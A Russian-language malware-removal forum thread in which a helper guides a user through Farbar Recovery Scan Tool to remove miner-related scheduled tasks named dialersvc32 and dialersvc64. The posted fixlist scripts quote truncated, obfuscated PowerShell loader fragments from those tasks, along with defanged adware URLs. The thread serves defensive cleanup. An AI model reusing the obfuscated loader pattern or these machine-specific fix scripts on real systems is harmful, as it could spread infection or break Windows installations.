Перейти к содержанию
Правила раздела

Сurelt не может удалить dialersvc32.job и dialersvc64.job

Adamka

Автор Adamka
в Помощь в удалении вирусов

 Поделиться

Рекомендуемые сообщения

Adamka

Adamka

Опубликовано
Опубликовано

Здравствуйте. Вижу уже некоторые люди сталкивались с данными проблемами в прошлом году, но, к сожалению, ответы в той теме мне не помогли, по этому создаю новую тему. Я так понял, это какой-то майнер, некоторые скрипты из рекомендации avz сработали и видеокарта перестала греться, но курейт все равно указывает о наличии данного файла
В общем, как было уже упомянуто, cureit не может удалить файл dialersvc32.job и dialersvc64.job. 
820476404_.thumb.jpg.16bc6251c61e5ee78ac1137e11d66dac.jpg

 

 

CollectionLog-2023.02.12-17.25.zip

mike 1

mike 1

Опубликовано
Опубликовано
1 час назад, Adamka сказал:

некоторые скрипты из рекомендации avz сработали и видеокарта перестала греться

Здравствуйте. Вы где-то еще лечитесь? Или выполняли чужие скрипты, написанные для других пользователей? В процессе сбора логов ошибок не было?

Adamka

Adamka

Опубликовано
  • Автор
Опубликовано (изменено)
19 минут назад, mike 1 сказал:

Здравствуйте. Вы где-то еще лечитесь? Или выполняли чужие скрипты, написанные для других пользователей? В процессе сбора логов ошибок не было?

Чужие скрипты выполнял. В частности пропускал некоторые шаги, где, как мне казалось, не мой путь исполнения. В частности из ДАННОЙ темы. Как я понял из скрипта, данный троян висит в планировщике задач и сразу нашел это:

image.thumb.png.5905c517dcfcbb21cadc2bddb986bc53.png

P.S. При попытке найти данный файл через редактор реестра - он тут же зависает. То же происходит при импорте в txt
 

Изменено пользователем Adamka
mike 1

mike 1

Опубликовано
Опубликовано

Чужой скрипт fixlist тоже выполнялся из той темы? Не выполняйте чужие скрипты, вы можете повредить себе систему. 

 

Скачайте Farbar Recovery Scan Tool  NAAC5Ba.png и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

  1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
  2. Убедитесь, что под окном Optional Scan отмечены, как на картинке ниже. 
  3. Нажмите кнопку Scan.
  4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.
  5. Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.


3munStB.png

 

 

  • Спасибо (+1) 1
mike 1

mike 1

Опубликовано
Опубликовано

ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!

  1. Временно выгрузите антивирус, файрволл и прочее защитное ПО.
  2. Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txtв кодировке Юникод в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:

        
    CreateRestorePoint:
CloseProcesses:
HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate: Ограничение <==== ВНИМАНИЕ
virustotal: C:\Program Files\FolderSize\FolderSize.exe
GroupPolicy: Ограничение ? <==== ВНИМАНИЕ
GroupPolicy\User: Ограничение ? <==== ВНИМАНИЕ
Policies: C:\ProgramData\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
Task: {0492232C-7C50-4E68-BDDE-391F3422C04A} - \ATK Package A22126881260 -> Нет файла <==== ВНИМАНИЕ
Task: {0D8F4833-7347-433F-A83A-C41B0984F5D8} - \IntelSURQC-Upgrade-86621605-2a0b-4128-8ffc-15514c247132 -> Нет файла <==== ВНИМАНИЕ
Task: {10C4EEE1-15BF-4925-9728-BFEF67C88C68} - \Microsoft_Hardware_Launch_ipoint_exe -> Нет файла <==== ВНИМАНИЕ
Task: {14E986FB-39F5-488C-BBE1-FC9865E29DF8} - \IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 -> Нет файла <==== ВНИМАНИЕ
Task: {24470061-F4FA-49A1-8E39-96D60782B942} - \NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} -> Нет файла <==== ВНИМАНИЕ
Task: {264A49A1-425B-4EDD-8749-66A10D1EEB47} - \IntelSURQC-Upgrade-86621605-2a0b-4128-8ffc-15514c247132-Logon -> Нет файла <==== ВНИМАНИЕ
Task: {3081EA9D-2409-4ED3-BA5B-7C5B52D6CD57} - \OneDrive Standalone Update Task-S-1-5-21-3531782659-3413247596-3454538255-1002 -> Нет файла <==== ВНИМАНИЕ
Task: {30D4F556-E790-4AF7-A216-536D8BF5F775} - \NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} -> Нет файла <==== ВНИМАНИЕ
Task: {3DC66AFC-4357-41AB-8102-1B28FB1E0CEE} - \Microsoft_MKC_Logon_Task_ceip.exe -> Нет файла <==== ВНИМАНИЕ
Task: {3DEAF111-FD4A-4DBE-AF76-A66A62AFC6A5} - \Microsoft_Hardware_Launch_mousekeyboardcenter_exe -> Нет файла <==== ВНИМАНИЕ
Task: {41F5FC9D-EE65-4CA4-A908-91B3587198E0} - \Microsoft\XblGameSave\XblGameSaveTask -> Нет файла <==== ВНИМАНИЕ
Task: {4DDC9B44-F6C8-4157-B463-0020085C5F7A} - \MicrosoftEdgeUpdateTaskMachineUA -> Нет файла <==== ВНИМАНИЕ
Task: {541889EF-B33A-450D-8F95-FF9973CBF1C5} - \GoogleUpdateTaskMachineUA -> Нет файла <==== ВНИМАНИЕ
Task: {560EF317-B17C-42E9-85DB-48CCB0DEB75E} - \RtkAudUService64_BG -> Нет файла <==== ВНИМАНИЕ
Task: {60D538DB-334F-4FF6-A0BA-DE195FA727D2} - \OneDrive Standalone Update Task-S-1-5-21-3531782659-3413247596-3454538255-500 -> Нет файла <==== ВНИМАНИЕ
Task: {625AAA6A-C0F7-495B-8ED8-B5A2A7E77A5A} - \ASUSSmartDisplayControl -> Нет файла <==== ВНИМАНИЕ
Task: {7606F174-EE08-48AD-95AB-0BA3B61DA1EF} - System32\Tasks\Microsoft\Windows\rempl\shell => C:\Program Files\rempl\sedlauncher.exe (Нет файла)
Task: {79D2964C-3371-45A7-B29B-FBBB4E1AA60E} - System32\Tasks\dialersvc64 => powershell ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+ (запись имеет ещё 256 символов). <==== ВНИМАНИЕ
Task: {8B9FF250-4165-4D61-BD05-00FCD7B410E6} - \OneDrive Reporting Task-S-1-5-21-3531782659-3413247596-3454538255-1002 -> Нет файла <==== ВНИМАНИЕ
Task: {9346D9BA-291C-4E54-ACB4-23F55E46251C} - \NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} -> Нет файла <==== ВНИМАНИЕ
Task: {9D9590A7-7D1A-4913-8FB1-A0DFBB26B5BC} - System32\Tasks\dialersvc32 => powershell ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+ (запись имеет ещё 256 символов). <==== ВНИМАНИЕ
Task: {A05AA1D1-7923-496F-ADAF-402FA8EFEAC0} - \NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} -> Нет файла <==== ВНИМАНИЕ
Task: {A0DA511E-A7CF-4696-B749-87DF7A72624D} - \User_Feed_Synchronization-{1647E8B0-86F5-4200-BEE0-794D075853FC} -> Нет файла <==== ВНИМАНИЕ
Task: {A37E02F9-2697-4A9F-97FD-DD3165AD6EF0} - \ATK Package 36D18D69AFC3 -> Нет файла <==== ВНИМАНИЕ
Task: {A82BD5FE-BE69-4864-840E-56B7F42F889E} - \NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} -> Нет файла <==== ВНИМАНИЕ
Task: {A8912B81-0C16-4C17-B486-02953C3386A5} - \Microsoft_Hardware_Launch_itype_exe -> Нет файла <==== ВНИМАНИЕ
Task: {AA8D476E-19FE-4C62-B2B9-8CC60F027DF8} - \ASUS Optimization 36D18D69AFC3 -> Нет файла <==== ВНИМАНИЕ
Task: {B33A0CE4-D728-4509-BF4C-45B80BEF7C37} - \klcp_update -> Нет файла <==== ВНИМАНИЕ
Task: {B36CC089-D1D6-44F9-A7EE-86A142F9A977} - \NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} -> Нет файла <==== ВНИМАНИЕ
Task: {BB69FCD8-02B0-4FB4-B5A0-B53FCF73C712} - \GoogleUpdateTaskMachineCore -> Нет файла <==== ВНИМАНИЕ
Task: {CC8C39C6-D60B-4274-BE3E-8AC7351E42E2} - \ASUS Update Checker 2.0 -> Нет файла <==== ВНИМАНИЕ
Task: {CD19BC8A-E9FE-49ED-92A5-0E1194F69F00} - \Microsoft\XblGameSave\XblGameSaveTaskLogon -> Нет файла <==== ВНИМАНИЕ
Task: {D10091A2-E4D3-4F16-A648-2B2E68FE80F3} - \CCleaner Update -> Нет файла <==== ВНИМАНИЕ
Task: {F086CF0E-2639-4F3F-AC83-12BE11E3DDD8} - \NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} -> Нет файла <==== ВНИМАНИЕ
Task: {F19BE97C-E56D-4CBE-B0E0-69AA9EEC9C28} - \MicrosoftEdgeUpdateTaskMachineCore -> Нет файла <==== ВНИМАНИЕ
Task: {FD591AF3-ABA2-4BFD-A70D-FE9D936BEAD3} - \NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} -> Нет файла <==== ВНИМАНИЕ
Edge HomePage: Default -> hxxp://www.oursurfing.com/?type=hp&ts=1437647688&z=f3bbc1d94df9f760e67ef95g4z6ccm7q8zfmaq2b8b&from=tt4u&uid=ST320DM001XHD322GJ_S2BJJ90C823705
Edge StartupUrls: Default -> "hxxp://www.oursurfing.com/?type=hp&ts=1437647688&z=f3bbc1d94df9f760e67ef95g4z6ccm7q8zfmaq2b8b&from=tt4u&uid=ST320DM001XHD322GJ_S2BJJ90C823705","hxxp://www.yoursites123.com/?type=hp&ts=1457963103&z=67bef0d3a88603c20275b79g5zewem2t6q6c2obgat&from=wpm0314&uid=ST320DM001XHD322GJ_S2BJJ90C823705","hxxp://www.google.com/","hxxp://mail.ru/cnt/10445?gp=818406","hxxp://mypoisk.su/","hxxp://mail.ru/cnt/10445?gp=811141","hxxp://startmain.ru/","hxxps://www.google.com/","hxxp://rusearch.co/"
CHR HomePage: Default -> hxxp://www.oursurfing.com/?type=hp&ts=1437647688&z=f3bbc1d94df9f760e67ef95g4z6ccm7q8zfmaq2b8b&from=tt4u&uid=ST320DM001XHD322GJ_S2BJJ90C823705
CHR StartupUrls: Default -> "hxxp://www.oursurfing.com/?type=hp&ts=1437647688&z=f3bbc1d94df9f760e67ef95g4z6ccm7q8zfmaq2b8b&from=tt4u&uid=ST320DM001XHD322GJ_S2BJJ90C823705","hxxp://www.yoursites123.com/?type=hp&ts=1457963103&z=67bef0d3a88603c20275b79g5zewem2t6q6c2obgat&from=wpm0314&uid=ST320DM001XHD322GJ_S2BJJ90C823705","hxxp://www.google.com/","hxxp://mail.ru/cnt/10445?gp=818406","hxxp://mypoisk.su/","hxxp://mail.ru/cnt/10445?gp=811141","hxxp://startmain.ru/","hxxps://www.google.com/","hxxp://rusearch.co"
StartMenuInternet: (HKU\S-1-5-21-3531782659-3413247596-3454538255-1001) Yandex.HJAFOUBX5LNUJ7CEH5QM2QRNDQ - "C:\Users\Администратор\AppData\Local\Yandex\YandexBrowser\Application\browser.exe"
StartMenuInternet: (HKU\S-1-5-21-3531782659-3413247596-3454538255-1002) Yandex.HJAFOUBX5LNUJ7CEH5QM2QRNDQ - "C:\Users\Администратор\AppData\Local\Yandex\YandexBrowser\Application\browser.exe"
File: C:\Users\Public\V1.exe
File: C:\Users\Public\A.exe
File: C:\Users\Adam\AppData\Roaming\F2F3.tmp
File: C:\Users\Public\Q.exe
File: C:\Users\Adam\AppData\Roaming\A71F.tmp
2023-02-06 15:24 - 2023-02-06 15:24 - 000000000 _____ C:\Users\Adam\AppData\Roaming\A71F.tmp
2023-02-06 15:02 - 2023-02-06 15:02 - 000000000 _____ C:\Users\Adam\AppData\Roaming\F2F3.tmp
2023-02-06 15:01 - 2023-02-06 15:24 - 002455040 _____ C:\Users\Public\V1.exe
2023-02-06 15:01 - 2023-02-06 15:24 - 000048640 _____ () C:\Users\Public\A.exe
2023-02-06 15:01 - 2023-02-06 15:01 - 000514048 ____H () C:\Users\Public\Q.exe
2023-02-06 15:01 - 2020-09-10 09:23 - 000022016 _____ () C:\Users\Adam\AppData\Roaming\Microsoft\Unteralterbach.exe
2023-02-06 15:01 - 2020-09-10 09:23 - 000005604 _____ () C:\Users\Adam\AppData\Roaming\Microsoft\Unteralterbach.py
2023-02-06 15:01 - 2020-09-10 09:23 - 000001547 _____ () C:\Users\Adam\AppData\Roaming\Microsoft\Unteralterbach.sh
2023-02-06 15:01 - 2022-08-19 23:26 - 000000559 _____ () C:\Users\Adam\AppData\Roaming\Microsoft\update.bat
Folder: C:\FRST\Quarantine


  3. Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!

  4. Обратите внимание, что компьютер будет перезагружен.

  • Согласен 1
Adamka

Adamka

Опубликовано
  • Автор
Опубликовано

Fixlog.txt

Файлы \Public\V1.exe, Q.exe, A.exe около недели назад были удалены куреитом. Актуальным куреитом ничего не было найдено

Adamka

Adamka

Опубликовано
  • Автор
Опубликовано
20 часов назад, mike 1 сказал:

Что с проблемой? 

Результат отсутствует, пока что. Жду и надеюсь на скрипт, какойто)

mike 1

mike 1

Опубликовано
Опубликовано

Антивирус продолжает находить угрозы? Или задания остались? 

  • Like (+1) 1
Adamka

Adamka

Опубликовано
  • Автор
Опубликовано
12 часов назад, mike 1 сказал:

Антивирус продолжает находить угрозы? Или задания остались? 

В автозагрузке нет, но курейт видит

1915558951_.thumb.jpg.f2dab1eb831a62ccfc95b0ad07f96961.jpg

mike 1

mike 1

Опубликовано
Опубликовано

Повторите логи frst.txt, addition.txt 

  • Согласен 1
mike 1

mike 1

Опубликовано
Опубликовано

ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!

  1. Временно выгрузите антивирус, файрволл и прочее защитное ПО.
  2. Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool: в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:


      

    CreateRestorePoint:
CloseProcesses:
zip:C:\WINDOWS\Tasks\dialersvc32.job;C:\WINDOWS\Tasks\dialersvc64.job
Task: C:\WINDOWS\Tasks\dialersvc32.job => ::\lOc`ALM`AChine\.(\{2}{1}{0}\ -f 'ey','ubk','OpenS').Invoke((\{1}{0}\-f'E','SOFTWAR')).(\{1}{0}{2}\ -f'u','GetVal','e').Inv
Task: C:\WINDOWS\Tasks\dialersvc64.job => ::\lOc`ALM`AChine\.(\{2}{1}{0}\ -f 'ey','ubk','OpenS').Invoke((\{1}{0}\-f'E','SOFTWAR')).(\{1}{0}{2}\ -f'u','GetVal','e').Inv
CHR HomePage: Default -> hxxp://www.oursurfing.com/?type=hp&ts=1437647688&z=f3bbc1d94df9f760e67ef95g4z6ccm7q8zfmaq2b8b&from=tt4u&uid=ST320DM001XHD322GJ_S2BJJ90C823705
CHR StartupUrls: Default -> "hxxp://www.oursurfing.com/?type=hp&ts=1437647688&z=f3bbc1d94df9f760e67ef95g4z6ccm7q8zfmaq2b8b&from=tt4u&uid=ST320DM001XHD322GJ_S2BJJ90C823705","hxxp://www.yoursites123.com/?type=hp&ts=1457963103&z=67bef0d3a88603c20275b79g5zewem2t6q6c2obgat&from=wpm0314&uid=ST320DM001XHD322GJ_S2BJJ90C823705","hxxp://www.google.com/","hxxp://mail.ru/cnt/10445?gp=818406","hxxp://mypoisk.su/","hxxp://mail.ru/cnt/10445?gp=811141","hxxp://startmain.ru/","hxxps://www.google.com/","hxxp://rusearch.co"
2023-02-13 09:28 - 2023-02-13 09:28 - 000000008 __RSH C:\ProgramData\ntuser.pol
2023-02-06 15:02 - 2023-02-06 15:24 - 000001406 _____ C:\WINDOWS\Tasks\dialersvc32.job
2023-02-06 15:02 - 2023-02-06 15:24 - 000001320 _____ C:\WINDOWS\Tasks\dialersvc64.job
Folder: C:\Program Files\dE



  3. Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!

  4. Обратите внимание, что компьютер будет перезагружен.

  5. Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то прикрепите этот архив к сообщению. 

  • Спасибо (+1) 1
Adamka

Adamka

Опубликовано
  • Автор
Опубликовано (изменено)
17.02.2023 в 10:19, mike 1 сказал:

 

  1. Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то прикрепите этот архив к сообщению. 

 

 

Выполнено. куреит чист. Архив утилизировать, с рабочего стола?

 

Изменено пользователем mike 1
Карантин

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Поделиться
Перейти к списку тем

  • Похожий контент

    • Malorym_Inqyy
      [РЕШЕНО] Троян в бесплатном впн
      Автор Malorym_Inqyy
      Здравствуйте, вчера скачал бесплатный впн, заметил, что в диспетчере появился процесс который грузит мой процессор, из-за чего компьютер стал сильно гудеть. Прошу помочь!
      CollectionLog-2025.12.05-14.31.zip
    • Kkaj
      Trojan/Win32.Tiggre
      Автор Kkaj
      хочу установить приложение, закинул на вирус тотал https://www.virustotal.com/gui/file/e85efe251c012827fa88e7dfa266b46e0df8c234acb8b6a21ed3ea209748df80?nocache=1, касперский ничего не показал, ему хоть и доверяю больше но Antiy-AVL показывает троян(остальные китайские нн)
       
      Сообщение от модератора Mark D. Pearlstone Тема перемещена из раздела "Помощь в удалении вирусов"
    • setl1ne
      [РЕШЕНО] Помогите устранить последствия присутствия майнера
      Автор setl1ne
      Поймал майнер, удалил его по гайдам через безопасный режим, но остались последствия в виде того, что есть какие-то ограничения по типу что вылазит ошибка 195 при установке amd adrenaline и ошибка в службе восстановления, помогите вернуть систему к рабочему состоянию
    • heathern
      Помогите удалить вирус!!
      Автор heathern
      К большому сожалению, я скачала какой-то zip файл на 2 с чем-то гб (это был мод) из вк по старой ссылке. Сначала, я ничего даже не заметила, но после того, как я его разархивировала и поместила в папку, в которой должен был быть сам мод, у меня открылась командная строка(Я проверила файл на вирус тотал и он показался трояном, а потом уже понеслось) "Хост Windows Shell Expenince" и в диспетчере задач она теперь там ПОСТОЯННО находится. При открытии диспетчера задач у меня диск загружен на 100% как и цп на 75%(может 71%, все равно много) и я вроде как удалила сам ярлык с игрой и этим модом, но теперь у меня так каждый раз (до того, пока я не удалила, диск не был нагружен на 100% и было всего 20-30 цп)  но нагружает не хост, а именно очень странные файлы как: System, Microsoft OneDrive и Power Toys.Run (я скачивала Power Toys до всего этого) меня очень смущает "System", ведь у него большое энергопотребление. Я сидела 2 часа (а то и так-то 3) смотрела какой-то тутор как его удалить, но все сходилось на том, что я не могла установить антивирус Касперский, нужна была перезагрузка, а я боялась, что у меня все слетит к чертям. Я старалась что-то искать, но ничего не нашла, я вообще не знаю что именно искать и как это убрать. Я пыталась найти что-то в resmon, делала mrt несколько раз, заходила в redget, но resmon люто лагал, а в поиске redget, я хотела найти сам троян, но он тоже тупил. Очень надеюсь, что мне хоть как-нибудь помогут тут ;(
      (Я уже заходила в безопасный режим и старалась вернуть права админа, чтобы удалить это, и после того как я хоть что-то удалила, стало только в разы хуже... Доктор веб не пробовала сканировать, у меня файл тупо не открывался, как и Касперский. На фотках ЦП мало, но после ещё очередной перезагрузки, он поднялся до 70%) И извиняюсь за мыльное качество


    • salad
      помогите удалить NET:MINERS.URL
      Автор salad
      Dr Web CureIt! обнаружил NET:MINERS.URL и не может его вылечить
      https://dropmefiles.com/kM9Ct - логи cureit
×
×
  • Создать...